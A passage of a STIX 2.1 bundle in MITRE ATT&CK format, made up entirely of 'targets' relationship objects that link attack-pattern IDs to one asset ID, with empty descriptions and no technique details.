"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837263", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40a87c93-8570-4da8-be16-7b2fc2d8405b", "created": "2024-07-01T10:37:15.837271", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837273", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--754cd62a-082c-42e0-b5bc-479b5e959cf3", "created": "2024-07-01T10:37:15.837281", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837283", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06df0383-e610-4c9d-87cf-fca311bb539b", "created": "2024-07-01T10:37:15.837290", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837292", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b91b9e62-2b87-48ef-94d0-769cd16deaf8", "created": "2024-07-01T10:37:15.837300", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837302", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b9e68fe2-7e23-485d-88af-c12e42eb3772", "created": "2024-07-01T10:37:15.837310", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837312", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc2dafc9-dc2e-4d7b-bc55-8edd84bed043", "created": "2024-07-01T10:37:15.837319", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837321", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7abb47e9-17c7-4ab0-b192-2fb0c54fb851", "created": "2024-07-01T10:37:15.837329", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837331", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32936c63-dd9f-4fe2-a2ad-8e54d5eb64bc", "created": "2024-07-01T10:37:15.837338", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837341", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0cda8b5d-542a-4636-a872-3b8c65e0be96", "created": "2024-07-01T10:37:15.837348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07f81bf9-b6ef-4484-8024-a8446cf0c7cc", "created": "2024-07-01T10:37:15.837358", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837360", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6be80cfe-bb2a-4ddb-98a6-3944addce110", "created": "2024-07-01T10:37:15.837368", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837370", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fdc81f4-4b8d-43a0-a439-6c0e50edc72c", "created": "2024-07-01T10:37:15.837377", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837379", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dd3cddc-ee38-4d8d-afa0-b4bcd4d1abc6", "created": "2024-07-01T10:37:15.837387", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837389", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c2cc489-e5e3-4153-9373-734c77b7c517", "created": "2024-07-01T10:37:15.837397", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837399", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1a72d5a-46d8-43ea-a99e-f4758de816df", "created": "2024-07-01T10:37:15.837406", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837409", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e873eb8-238b-435e-a975-9c2514161a4f", "created": "2024-07-01T10:37:15.837416", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837418", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e8e6dd4-1bab-4d08-9e5e-0db579c6e5b0", "created": "2024-07-01T10:37:15.837426", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837428", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bd324fa-3cc8-4398-bd4a-897ebd5aca8c", "created": "2024-07-01T10:37:15.837435", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837437", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dcbc6eda-a3d1-4c18-ba2f-496a51a82375", "created": "2024-07-01T10:37:15.837445", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837447", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c81bcda4-c798-4211-a0f2-96ae9f8410e6", "created": "2024-07-01T10:37:15.837454", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837456", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5fbb6478-a429-49ec-a39b-7860524af1a5", "created": "2024-07-01T10:37:15.837464", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837466", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cba55eb0-b5cb-4b3d-ac55-5b6e392af4d5", "created": "2024-07-01T10:37:15.837474", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837476", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f4177c5-c1d8-4701-a8fe-8b052a063d1b", "created": "2024-07-01T10:37:15.837483", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837485", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--147e025d-8c2c-4721-bb00-e2b1ed51d99e", "created": "2024-07-01T10:37:15.837493", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837495", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c0912e00-dae1-4758-821e-92954b6d0fb2", "created": "2024-07-01T10:37:15.837502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837504", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--420d0c8f-b69c-42d3-be30-25119bfb2522", "created": "2024-07-01T10:37:15.837512", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837514", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b93d434d-9025-4858-adad-4694d6553ad9", "created": "2024-07-01T10:37:15.837522", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837524", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a86d3936-6beb-4bf7-88e2-5d09006d19bb", "created": "2024-07-01T10:37:15.837531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0fbb2e48-e96b-4f8a-9387-a6cbd2e8451d", "created": "2024-07-01T10:37:15.837541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a5626f70-704f-485d-8ea8-676502ce2eec", "created": "2024-07-01T10:37:15.837551", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837553", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2ff17bd-68f6-409e-937d-a6664ec2eb9f", "created": "2024-07-01T10:37:15.837560", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837562", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--858d63cb-3952-494e-89f5-390a40f4088c", "created": "2024-07-01T10:37:15.837570", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837572", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e1230eb-3d0f-485d-ab3b-7a2582af122c", "created": "2024-07-01T10:37:15.837580", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837582", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6afd2f81-acc5-456e-9791-8b8bc7368232", "created": "2024-07-01T10:37:15.837589", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837591", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d272e17b-a618-44ab-8eaf-6774bbda9ce7", "created": "2024-07-01T10:37:15.837599", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837601", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95af0419-db03-4200-834b-3b246d930fda", "created": "2024-07-01T10:37:15.837609", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837611", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--497bc389-041a-436d-887d-f0b7173dad4a", "created": "2024-07-01T10:37:15.837618", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837620", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f4f2570-9b76-4994-a7e8-e5c374b1eb7a", "created": "2024-07-01T10:37:15.837628", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837630", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dcb92322-9acd-4c8c-a824-1ecaf9eca2da", "created": "2024-07-01T10:37:15.837637", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837640", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5e09bd3-6687-4a30-bae7-7166f84e08c3", "created": "2024-07-01T10:37:15.837648", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837650", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b57a54a-be69-4667-a6b8-974660c9b435", "created": "2024-07-01T10:37:15.837658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 